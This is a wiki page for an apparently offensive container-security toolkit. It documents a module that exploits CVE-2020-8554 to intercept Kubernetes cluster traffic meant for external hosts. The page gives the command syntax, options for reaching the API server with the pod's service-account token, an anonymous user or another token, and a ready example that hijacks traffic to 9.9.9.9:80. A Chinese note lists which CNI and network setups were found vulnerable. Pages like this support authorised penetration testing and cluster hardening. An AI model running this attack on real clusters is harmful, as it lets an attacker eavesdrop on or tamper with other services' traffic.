-
Notifications
You must be signed in to change notification settings - Fork 543
Evaluate: k8s mitm clusterip
cdxy edited this page Jan 22, 2021
·
5 revisions
Exploit CVE-2020-8554: Man in the middle using ExternalIPs. It allows an attacker to intercept traffic that was intended for an external dependency.
K8s中间人攻击(CVE-2020-8554)
注经测试并于K8S官方确认,该漏洞只影响部分CNI插件和网络模式,以下为测试成功的场景:
- 部分CNI + Iptables 可劫持 POD network
- 部分CNI + IPVS 可劫持 可劫持 NODE network
- Global Router + IPVS 可劫持 可劫持 NODE network
因此在 minikube 里可能无法复现。
See more in https://unit42.paloaltonetworks.com/cve-2020-8554/
First it will deploy in cluster, then create a service to hijack cluster traffic send to remote :
cdk run k8s-mitm-clusterip (default|anonymous|<service-account-token-path>) <image> <ip> <port>
Request Options:
default: connect API server with pod's default service account token
anonymous: connect API server with user system:anonymous
<service-account-token-path>: connect API server with user-specified service account token.
Exploit Options:
image: target image to MITM hijack.
ip: target remote IP to hijack traffic.
port: target remote PORT to hijack traffic.
deploy image ubuntu in the cluster to hijack outgoing traffic to 9.9.9.9:80
./cdk run k8s-mitm-clusterip default ubuntu 9.9.9.9 80